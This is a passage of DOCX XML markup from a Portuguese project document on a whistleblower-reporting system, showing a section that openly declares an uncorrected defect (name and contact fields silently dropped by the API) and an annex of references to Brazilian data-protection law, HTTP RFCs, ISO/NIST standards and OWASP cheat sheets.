    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkStart w:id="174" w:name="Xe6b5056072e6e6637ea69665a7967bdc9cda2ef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.5 Defeito encontrado e declarado, não corrigido nesta fase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uma última passagem de conferência, já com o documento fechado, comparou cada afirmação de mascaramento com o código que deveria sustentá-la. Ela encontrou um item que não foi corrigido, e que fica registrado aqui em vez de ser omitido.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23"/>
        <w:gridCol w:w="2432"/>
        <w:gridCol w:w="2432"/>
        <w:gridCol w:w="24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se manifesta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canal identificado coleta nome e contato que a API não recebe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nível 3 de anonimato o formulário mostra os campos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">f-nome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f-contato</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">main.js</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">os envia no corpo do POST.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DenunciaRequest</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">não declara nenhum dos dois, então o Jackson os descarta em silêncio e nada é persistido. Em modo local o dado fica no navegador, o que torna o defeito invisível numa demonstração sem back-end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Declarado na seção 5.8, com a correção descrita arquivo a arquivo. Não aplicado nesta fase porque altera a entidade, o modelo físico e a contagem de colunas do Anexo A, e não haveria tempo de reexecutar a verificação completa depois da mudança</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A decisão de declarar em vez de corrigir às pressas segue o mesmo critério das outras seções deste documento:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">uma correção que não pode ser verificada antes da entrega vale menos do que um defeito conhecido e escrito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O leitor que for avaliar o sistema sabe exatamente o que vai encontrar e onde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:id="183" w:name="anexo-e-referências"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo E: Referências</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As fontes abaixo sustentam as decisões de projeto defendidas neste documento. Todas foram consultadas e verificadas durante a redação, e cada uma é citada no texto pelo sistema autor-data. Os endereços eletrônicos foram acessados em setembro de 2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três observações sobre o critério de seleção. Primeiro,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">legislação e norma técnica vêm sempre da fonte primária</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: o texto das leis foi lido no portal do Planalto, e as especificações HTTP no repositório da IETF. Segundo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dado estatístico de terceiro só entrou quando pôde ser atribuído ao órgão que o produziu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não a uma repercussão. Terceiro, onde uma especificação foi substituída por outra, as duas aparecem, e a nota explica qual trecho veio de onde.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="176" w:name="Xc2fbacae65eed3a9ca40c4a08065d14e7e99797"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.1 Legislação e normas do poder público brasileiro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lei nº 13.460, de 26 de junho de 2017</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dispõe sobre participação, proteção e defesa dos direitos do usuário dos serviços públicos da administração pública. Brasília: Presidência da República, 2017. Disponível em: https://www.planalto.gov.br/ccivil_03/_ato2015-2018/2017/lei/l13460.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lei nº 13.709, de 14 de agosto de 2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lei Geral de Proteção de Dados Pessoais (LGPD). Brasília: Presidência da República, 2018a. Disponível em: https://www.planalto.gov.br/ccivil_03/_ato2015-2018/2018/lei/l13709.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lei nº 13.608, de 10 de janeiro de 2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dispõe sobre o serviço telefônico de recebimento de denúncias e sobre recompensa por informações que auxiliem nas investigações policiais; com as alterações da Lei nº 13.964/2019, que incluiu os arts. 4º-A a 4º-C. Brasília: Presidência da República, 2018b. Disponível em: https://www.planalto.gov.br/ccivil_03/_ato2015-2018/2018/lei/L13608.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Decreto nº 9.492, de 5 de setembro de 2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Regulamenta a Lei nº 13.460/2017 e institui o Sistema de Ouvidoria do Poder Executivo federal. Brasília: Presidência da República, 2018c. Disponível em: https://www.planalto.gov.br/ccivil_03/_ato2015-2018/2018/decreto/d9492.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Decreto nº 10.153, de 3 de dezembro de 2019</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dispõe sobre as salvaguardas de proteção à identidade dos denunciantes de ilícitos e de irregularidades praticados contra a administração pública federal direta e indireta. Brasília: Presidência da República, 2019. Disponível em: https://www.planalto.gov.br/ccivil_03/_ato2019-2022/2019/decreto/D10153.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AUTORIDADE NACIONAL DE PROTEÇÃO DE DADOS (ANPD).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Guia Orientativo sobre Segurança da Informação para Agentes de Tratamento de Pequeno Porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Versão 1.0. Brasília: ANPD, 2021. Disponível em: https://www.gov.br/anpd/pt-br/centrais-de-conteudo/materiais-educativos-e-publicacoes/guia-vf.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AUTORIDADE NACIONAL DE PROTEÇÃO DE DADOS (ANPD).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resolução CD/ANPD nº 15, de 24 de abril de 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aprova o Regulamento de Comunicação de Incidente de Segurança. Brasília: ANPD, 2024. Disponível em: https://bibliotecadigital.mj.gov.br/bitstream/1/12879/2/RES_ANPD_2024_15.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AUTORIDADE NACIONAL DE PROTEÇÃO DE DADOS (ANPD).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3º Relatório de Ciclo de Monitoramento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 2º semestre de 2023 a 1º semestre de 2025. Brasília: ANPD, 2025. Disponível em: https://www.gov.br/anpd/pt-br/acesso-a-informacao/institucional/atos-normativos/regulamentacoes_anpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UNIÃO EUROPEIA.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Diretiva (UE) 2019/1937 do Parlamento Europeu e do Conselho</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de 23 de outubro de 2019, relativa à proteção das pessoas que denunciam violações do direito da União. Jornal Oficial da União Europeia, 2019. Disponível em: https://eur-lex.europa.eu/legal-content/PT/TXT/PDF/?uri=CELEX:32019L1937</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="176"/>
    <w:bookmarkStart w:id="177" w:name="Xd896af87b1d64cb1fa3534377d7982f89df5ec0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.2 Dados públicos e relatórios institucionais</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AGÊNCIA BRASIL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Intolerância religiosa: Disque 100 registra 2,4 mil casos em 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Brasília: Empresa Brasil de Comunicação, 2025. Disponível em: https://agenciabrasil.ebc.com.br/geral/noticia/2025-01/intolerancia-religiosa-disque-100-registra-24-mil-casos-em-2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CONTROLADORIA-GERAL DA UNIÃO (CGU).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fala.BR: Módulo Ouvidoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Brasília: CGU, [s.d.]a. Disponível em: https://wiki.cgu.gov.br/index.php/Fala.BR_-_M%C3%B3dulo_Ouvidoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CONTROLADORIA-GERAL DA UNIÃO (CGU).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Relatório de Avaliação de Ouvidoria: Ouvidoria do INSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Brasília: CGU, 2025. Avaliação referente ao período de 01/11/2022 a 31/10/2023. Disponível em: https://basedeconhecimento.cgu.gov.br</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INSTITUTO DE PESQUISA ECONÔMICA APLICADA (IPEA).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dados sobre estupro no Brasil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Policy Brief, Atlas da Violência. Autores: Helder Ferreira, Danilo Coelho, Daniel Cerqueira, Paloma Alves e Marcella Semente. Brasília: Ipea, 2023. Disponível em: https://www.ipea.gov.br/atlasviolencia/arquivos/artigos/1694-pbestuprofinal.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNATIONAL BUSINESS MACHINES (IBM).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cost of a Data Breach Report 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Armonk: IBM Security, em parceria com o Ponemon Institute, 2026. Disponível em: https://www.ibm.com/reports/data-breach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MINISTÉRIO DOS DIREITOS HUMANOS E DA CIDADANIA (MDHC).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Disque 100 registra 657,2 mil denúncias em 2024 e crescimento de 22,6% em relação a 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Brasília: Ouvidoria Nacional dos Direitos Humanos, 2025. Disponível em: https://www.gov.br/mdh/pt-br/assuntos/noticias/2025/janeiro/disque-100-registra-657-2-mil-denuncias-em-2024-e-crescimento-de-22-6-em-2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TRANSPARENCY INTERNATIONAL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Whistleblower protection in 2026: the gap between law and reality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Autora: Marie Terracol. Berlim: Transparency International, 2026. Disponível em: https://www.transparency.org/en/blog/whistleblower-protection-law-retaliation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:id="178" w:name="Xbb86ce830aca93905382bec48a1b9597f6bde6e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.3 Especificações técnicas e normas de segurança</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 6585: Additional HTTP Status Codes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Autores: M. Nottingham e R. Fielding. 2012. Define o código 429 Too Many Requests. Disponível em: https://www.rfc-editor.org/rfc/rfc6585.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7231: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 2014a. Obsoleto, substituído pelo RFC 9110; citado neste documento apenas pelo texto literal da seção 4.2.1, sobre métodos seguros. Disponível em: https://www.rfc-editor.org/rfc/rfc7231.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7235: Hypertext Transfer Protocol (HTTP/1.1): Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 2014b. Obsoleto, substituído pelo RFC 9110; citado pelo texto literal da seção 3.1, sobre o código 401. Disponível em: https://www.rfc-editor.org/rfc/rfc7235.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7519: JSON Web Token (JWT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Autores: M. Jones, J. Bradley e N. Sakimura. 2015. Disponível em: https://www.rfc-editor.org/rfc/rfc7519.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 8725: JSON Web Token Best Current Practices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(BCP 225). 2020. Disponível em: https://www.rfc-editor.org/rfc/rfc8725.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNET ENGINEERING TASK FORCE (IETF).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 9110: HTTP Semantics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(STD 97). Autores: R. Fielding, M. Nottingham e J. Reschke. 2022. Padrão vigente de semântica HTTP, ao qual correspondem as seções de método e de código de status citadas na Parte 3. Disponível em: https://www.rfc-editor.org/rfc/rfc9110.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INTERNATIONAL ORGANIZATION FOR STANDARDIZATION; INTERNATIONAL ELECTROTECHNICAL COMMISSION.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ISO/IEC 27002:2022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: information security, cybersecurity and privacy protection: information security controls. 3. ed. Genebra: ISO, 2022. Controle 8.15, Logging. Disponível em: https://www.iso.org/standard/75652.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SP 800-92: Guide to Computer Security Log Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Autores: Karen Kent e Murugiah Souppaya. Gaithersburg: NIST, 2006. Disponível em: https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10: 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 2023. Disponível em: https://owasp.org/API-Security/editions/2023/en/0x11-t10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password Storage Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]a. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Logging Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]b. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File Upload Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]c. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Request Forgery Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]d. Seção sobre cabeçalhos personalizados e CORS. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mass Assignment Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]e. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CSV Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Community, [s.d.]f. Disponível em: https://owasp.org/www-community/attacks/CSV_Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPEN WORLDWIDE APPLICATION SECURITY PROJECT (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Application Logging Vocabulary Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP Cheat Sheet Series, [s.d.]g. Disponível em: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Vocabulary_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PROVOS, Niels; MAZIÈRES, David.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A Future-Adaptable Password Scheme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In: USENIX ANNUAL TECHNICAL CONFERENCE, 1999, Monterey. Proceedings of the FREENIX Track. Berkeley: USENIX Association, 1999. Referência original do algoritmo bcrypt. Disponível em: https://www.usenix.org/legacy/event/usenix99/provos/provos.pdf</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkStart w:id="179" w:name="X8b48fecc2205d2224906a2c49aa7504a8c5f660"/>
